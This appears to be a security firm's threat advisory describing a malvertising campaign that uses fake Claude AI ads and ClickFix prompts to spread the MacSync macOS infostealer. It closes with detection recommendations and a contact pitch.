Fake Claude AI Ads Used to Deliver macOS Infostealer Malware

Overview

A new malvertising campaign is targeting macOS users through fake Google Search advertisements and deceptive AI download portals impersonating popular tools such as Claude AI.

According to publicly shared threat research, attackers are combining:

• sponsored Google Ads
• trusted hosting platforms
• ClickFix social engineering
• fake AI desktop installers

to distribute a macOS infostealer known as MacSync.

The campaign highlights the growing focus of threat actors on:

• macOS environments
• AI-themed phishing
• credential theft
• browser session hijacking

How the Attack Works

The campaign begins with sponsored Google Ads appearing in searches related to:

• Claude AI
• AI desktop tools
• productivity applications
• developer software

The ads closely resemble legitimate vendor promotions and frequently leverage:

• convincing branding
• trusted hosting infrastructure
• SEO manipulation tactics

Victims are redirected to fake landing pages hosted through:

• Google Sites
• Framer
• Claude.ai shared chats
• other legitimate cloud platforms

By abusing trusted infrastructure, attackers reduce the likelihood of detection by:

• domain reputation filters
• web gateways
• automated blocking systems

The ClickFix Technique

The operation also uses ClickFix-style social engineering.

Victims are shown:

• fake warning dialogs
• installation errors
• compatibility issues
• prompts requesting a “fix”

Users are then instructed to:

• execute terminal commands
• install helper applications
• launch malicious installers

This allows the malware payload to execute without requiring an exploit or software vulnerability.

What the Malware Does

Once executed, MacSync operates as a macOS infostealer.

Researchers report that the malware targets:

• browser credentials
• saved passwords
• session tokens
• cryptocurrency wallet data
• browser cookies
• authentication information

The collected data is exfiltrated to attacker-controlled infrastructure.

Researchers also observed:

• rapid domain rotation
• dynamic redirect infrastructure
• rotating hosting providers
• short-lived malicious landing pages

Why It Matters

This campaign highlights several important trends.

1. AI branding is becoming a phishing lure

The popularity of AI tools creates strong user trust and lowers suspicion.

2. macOS is no longer a secondary target

More malware campaigns are actively targeting:

• developers
• executives
• designers
• crypto users
• SaaS-focused environments

that frequently rely on macOS devices.

3. Trusted platforms are being weaponized

Google Sites, Framer, and similar services are increasingly used as delivery infrastructure to bypass traditional filtering controls.

DIAMATIX Perspective

This campaign does not rely on exploits or zero-day vulnerabilities.

The primary risk comes from:

• user trust
• legitimate-looking infrastructure
• social engineering
• trusted cloud services
• manual user execution

This makes detection significantly harder, especially when:

• traffic appears legitimate
• domains are trusted
• no exploit behavior exists
• execution is initiated by the user

CISO Analysis

This case demonstrates why modern phishing detection can no longer rely only on:

• reputation checks
• domain blacklists
• traditional AV signatures

Organizations need visibility into:

• unusual script execution
• browser-to-terminal activity
• abnormal macOS process chains
• suspicious token access
• cloud-hosted malware delivery patterns

AI-themed phishing campaigns are likely to continue increasing throughout 2026.

What this means for your environment

• This type of attack relies on trusted cloud infrastructure and user-driven execution, not exploit chains
• Detection depends on endpoint visibility and behavioral monitoring, especially around browser and terminal activity
• Response requires a combination of user awareness, endpoint telemetry, and cloud traffic analysis

Would your environment detect browser-to-terminal execution on macOS endpoints?
Do you have visibility into AI-themed phishing activity targeting employees?
See how these attack chains are investigated and handled in real operational environments.

Contact DIAMATIX

Sources

• Independent threat research published on X by Berk Albayrak and g0njxa
• Public malware infrastructure analysis
• Industry reporting on ClickFix and macOS infostealer campaigns
• Google Ads malvertising research (May 2026)